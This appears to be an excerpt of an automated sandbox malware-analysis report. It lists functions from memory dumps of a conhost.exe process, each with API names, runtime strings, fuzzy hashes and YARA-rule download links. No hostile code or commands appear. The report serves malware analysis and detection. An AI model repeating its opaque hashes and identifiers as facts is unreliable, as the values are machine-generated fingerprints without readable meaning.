                                                          • API String ID: 4061214504-1276376045
                                                          • Opcode ID: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction ID: 411aea5d55f45ef57f2fd69d53b7a6ad95c33c6fde4d79972bacf7e3ec743744
                                                          • Opcode Fuzzy Hash: 98eb24e4d57f1585c54f2d3d16aa4b08ded3b1fa128793edf9192e1fe004f7b7
                                                          • Instruction Fuzzy Hash: C2F062B131361885EF188BA5E86439D5320FF657A9F540217C67A451F4DF3DC488D300
                                                          Function 000001D29E8C5500 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction ID: 44e28a2a0c59aadc5f0f8363c8e6a458dce829833d0802cce118796aafd93459
                                                          • Opcode Fuzzy Hash: 758a31af71cbbd98710326f5d5dd73fd8f3faa0c353224d70a8a3d8e98f497e1
                                                          • Instruction Fuzzy Hash: F702EF3211AB9486DB64CB95F49479AB7A0F3D5798F104116EBEE47BA8DF7CC484CB00
                                                          Function 000001D29E8C5B40 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CurrentThread
                                                          • String ID:
                                                          • API String ID: 2882836952-0
                                                          • Opcode ID: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction ID: 9f8b940c8333751b98db87ba7eab5d8ae936700b65df810cc807392199f1fa23
                                                          • Opcode Fuzzy Hash: a4c708464c669e8ac6b2107c0414dd5148c6b67da4caf1212569ceb4eb7b4d9f
                                                          • Instruction Fuzzy Hash: 1561CB3611BB54C6EB64DB95E46435A77A0F399788F50011AFAAD47BB8DB7CC540CF00
                                                          Function 000001D29E8D4534 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 48dfb80fe3d0d51b8649efff20ddf42be1178ebca4cc6a3bd43c4b9c8d86810e
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: 7C118E32A12A7141FB6C16E9E4763ED11A1BF7837CF484636EA76076F6CB7888C94200
                                                          Function 000001D29E8A3934 Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _set_statfp
                                                          • String ID:
                                                          • API String ID: 1156100317-0
                                                          • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction ID: 9e93c2ad1bb3061a3fc6bfa3f8b69173680c27793be08e70f518efb9e3b77ed0
                                                          • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                          • Instruction Fuzzy Hash: B6117332A16B3191FABC19E8E4763ED11417B7637CF0D4637EA7A0A6FBCB7489459100
                                                          Function 000001D29E8CAE4C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallEncodePointerTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3544855599-2084237596
                                                          • Opcode ID: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction ID: 5153bec5762938f16cfb5b5b8ad950c760c9099c712402eac850335ad1f1ed6d
                                                          • Opcode Fuzzy Hash: 05fb19cb5d958d360e5f46d501e280b4416caeae58329d8bd7a5de4c8cbcf2a2
                                                          • Instruction Fuzzy Hash: E961AF73602B949AE728CFA5D4903DD77A0F359B8CF044256EF6A17BA9DB38C585C700
                                                          Function 000001D29E8CB1A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: 999cf6a754b1ceb4f89c1b25830423a5850f73961378d3507682051992bf0dbc
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 7B516232103AA0CAEB688FA1946439C77D8F766B98F148617DA7987BF5CB38D451C701
                                                          Function 000001D29E89A5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                          • String ID: csm$csm
                                                          • API String ID: 3896166516-3733052814
                                                          • Opcode ID: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction ID: b7ce5dc5f574f8830c7b0dbb7331afe685c33684bdccf4b25e1dc503635c4bfe
                                                          • Opcode Fuzzy Hash: 92a9139125581d210e17e0e512ec335e12b84a8ad252812ef56c38af1cf641ca
                                                          • Instruction Fuzzy Hash: 4A51C33A9013A0E6EB788FA5D4A83A877A0F374B9CF144157DAB947BE5DB38D451CB00
                                                          Function 000001D29E8C3554 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 55COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                          • String ID: pid_
                                                          • API String ID: 517849248-4147670505
                                                          • Opcode ID: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction ID: 30a30c1b44d1bb422a00f2070cb3b0480ca21b66c8de6741ef54d9e395c14e88
                                                          • Opcode Fuzzy Hash: 003ff62f248625063318c3f9e3d6e241277a7bda76ff5f02da447dbddd7f43fe
                                                          • Instruction Fuzzy Hash: 4211AF31307B6192EB189BA5E8663DE53A0FB65788F804162DE78837B5EF38C946C744
                                                          Function 000001D29E8D2488 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileWrite$ConsoleErrorLastOutput
                                                          • String ID:
                                                          • API String ID: 2718003287-0
                                                          • Opcode ID: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction ID: d19f5a44d3fd1bb76b3f02213af3c01c185202178e45e42ddf7758d730c41145
                                                          • Opcode Fuzzy Hash: 795992a6124246315900671f12580f797be80ebc569419187a9af15682e1d93c
                                                          • Instruction Fuzzy Hash: 39D10132B06A9489E715CFE9D4603DC37B1FB68B9CF044216CE79A7BA9DA34C496C740
                                                          Function 000001D29E8C14A4 Relevance: 6.3, APIs: 5, Instructions: 37memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: Heap$Process$Free
                                                          • String ID:
                                                          • API String ID: 3168794593-0
                                                          • Opcode ID: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction ID: b7e7f1b63825c9a2be8dd9ded004a13c6fd9e98d53e34b826bda65f008777a91
                                                          • Opcode Fuzzy Hash: f2d6af867017c8fdca06cc75cff9703ddcaaa443aeb9202065457787ca9ddd0f
                                                          • Instruction Fuzzy Hash: 7D015E72602AA0C6DB48DFE6E85418EB7B1FF99F84F044426EA6943729DE38C091C740
                                                          Function 000001D29E8D2DB0 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001D29E8D2D9B), ref: 000001D29E8D2ECC
                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,000001D29E8D2D9B), ref: 000001D29E8D2F57
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ConsoleErrorLastMode
                                                          • String ID:
                                                          • API String ID: 953036326-0
                                                          • Opcode ID: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction ID: e9bfcbbcd138b4d7dd4df6a8df15003861a828a91160f34df5af8163ee159cdb
                                                          • Opcode Fuzzy Hash: ed4da88c6f9953f7d7ff9071fd661f4bfe943a7a16315c9e976136c82c347ad5
                                                          • Instruction Fuzzy Hash: CF91F27270267485F7689FA594603ED6BA4FF69B9CF14411BDE3A676A5CB34C8C2C300
                                                          Function 000001D29E8C2604 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction ID: f8671f7ddd9d3151e8de402689eb3f6df7e55b31f66172980a505d12df263d65
                                                          • Opcode Fuzzy Hash: 33e1af66e0871330679004fe562d697de0fc8c89851f4c88526204be402beab6
                                                          • Instruction Fuzzy Hash: 7D71B532203BA186E72DDFAA98A43EE6790F7AAB88F440017DD39537E9DE34C545C740
                                                          Function 000001D29E89A24C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: CallTranslator
                                                          • String ID: MOC$RCC
                                                          • API String ID: 3163161869-2084237596
                                                          • Opcode ID: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction ID: 3343cf5fbf8b8897b8f77685b865c3ec09019879f5b34131eea1c4abd1601fac
                                                          • Opcode Fuzzy Hash: 30a9d0c0d3f57c599bda06983a5ca6919b98e12de895e70124a407b05a736fc2
                                                          • Instruction Fuzzy Hash: 7D618B37A05B949AEB28CFA5D4943DD77A0F368B8CF044256EF6917BA8DB38D485C700
                                                          Function 000001D29E8C23F8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: FileType
                                                          • String ID: \\.\pipe\
                                                          • API String ID: 3081899298-91387939
                                                          • Opcode ID: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction ID: d211cb8ea232f5b40925d724f767afdb1e4ce081fd21d7ae6c03d7f050daeb74
                                                          • Opcode Fuzzy Hash: d24fa520fd7dbb7ec2b76f1d32a897148e6d9871f9771e10c0de33aaa48a33cd
                                                          • Instruction Fuzzy Hash: A151D636207BA181E7AC9AE5A4743EB6751F3AA788F440117DE7903BF9EE39C445C740
                                                          Function 000001D29E8A2DDB Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 140COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: _log10_special
                                                          • String ID: dll
                                                          • API String ID: 3812965864-1037284150
                                                          • Opcode ID: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction ID: 8126520eb642e1b9832b80c5f14346f2032b3576af71cf94ab3f74053c8cc8bc
                                                          • Opcode Fuzzy Hash: f5c871aa60dc0e0ec45b8b1933c36a9d422e8a67736998cb73b4f17a378e9579
                                                          • Instruction Fuzzy Hash: 1D613031927F688CD6679BB994712A56B5CBF723CDF41D307E93A72A71EB3990038200
                                                          Function 000001D29E8D2B20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ErrorFileLastWrite
                                                          • String ID: U
                                                          • API String ID: 442123175-4171548499
                                                          • Opcode ID: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction ID: d61fbb89930ff07a8261cd5928fdef88125afa4d0c86fb264f0195240b574bc3
                                                          • Opcode Fuzzy Hash: 08a3ddd2b86f7b8515106781585b8c8a1d40bea7a265024b77d0f248b7dc9f58
                                                          • Instruction Fuzzy Hash: AF41E472316A5482DB24DFA5E4543EE77A0FBA8798F404022EE6D877A8DB7CC481C740
                                                          Function 000001D29E8C98D0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
                                                          • Associated: 00000020.00000002.2314272678.000001D29E8C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2315097931.000001D29E8D6000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2322726845.000001D29E8E1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323111128.000001D29E8E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000020.00000002.2323539773.000001D29E8E9000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_2_1d29e8c0000_conhost.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFileHeaderRaise
                                                          • String ID: csm
                                                          • API String ID: 2573137834-1018135373
                                                          • Opcode ID: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction ID: 789cd6d13d63871bdedcaad1c698f3d27871a1fd1b1612e0793705990e2806fa
                                                          • Opcode Fuzzy Hash: d6e187f7c3a97b3215a18421b3b0fdb8c27e8d274db127c5d8f8eb200af9c340
                                                          • Instruction Fuzzy Hash: E3115E32216B9482EB258F25F410399B7E0FB99B88F584665DEAC07768DF3CC5558B00
                                                          Function 000001D29E897786 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: `vector constructor iterator'$ctor closure'
                                                          • API String ID: 592178966-3792692944
                                                          • Opcode ID: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction ID: 222ab89ede8730364fd66c3ff642a418130a976346cadb3df6bee7a3ea60d33d
                                                          • Opcode Fuzzy Hash: 3d94f62f39723b7dc1272b79e31019e2f4db169682176d2f048e7421b3153389
                                                          • Instruction Fuzzy Hash: E7E08671A42B44E0DF158F61E4902D833A0EB78B68F4C9123D97C0A321FB38D1E9C301
                                                          Function 000001D29E8977E4 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: __std_exception_copy
                                                          • String ID: ctor closure'$destructor iterator'
                                                          • API String ID: 592178966-595914035
                                                          • Opcode ID: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction ID: 54d69dd8e3a10fb69431f31c9e47045b6bc5fbeadc2ffc58a0b9a059ffa2de0d
                                                          • Opcode Fuzzy Hash: 178c451bf754e9b3f91433b5168c8e4fc02ede9add1333831d18f9cb102bf374
                                                          • Instruction Fuzzy Hash: 56E0E671A52B55D0DF158FA1E4901D87365F778B5CF889123D97C4A365EA38D1E5C300
                                                          Function 000001D29E8978EC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000003.2254503024.000001D29E890000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001D29E890000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_32_3_1d29e890000_conhost.jbxd
                                                          Similarity
                                                          • API ID: std::bad_alloc::bad_alloc
                                                          • String ID: `scalar deleting destructor'$rFeaturePresent
                                                          • API String ID: 1875163511-1689945142
                                                          • Opcode ID: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction ID: 0181d76f97bfe97161b40d018a0446171709d08f51e6ded7dfdac6a6ea59d863
                                                          • Opcode Fuzzy Hash: 825dc38fabb3a4a7c87f2f3a88ae4ed20e2ecae66053889663208d07eaa1d642
                                                          • Instruction Fuzzy Hash: 6BD09E32622A95A5EE24EB84D8A93C96334F3B434DF944413D17D92975DF3DCA8BC740
                                                          Function 000001D29E8C1C34 Relevance: 5.0, APIs: 4, Instructions: 46memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000020.00000002.2314577123.000001D29E8C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 000001D29E8C0000, based on PE: true
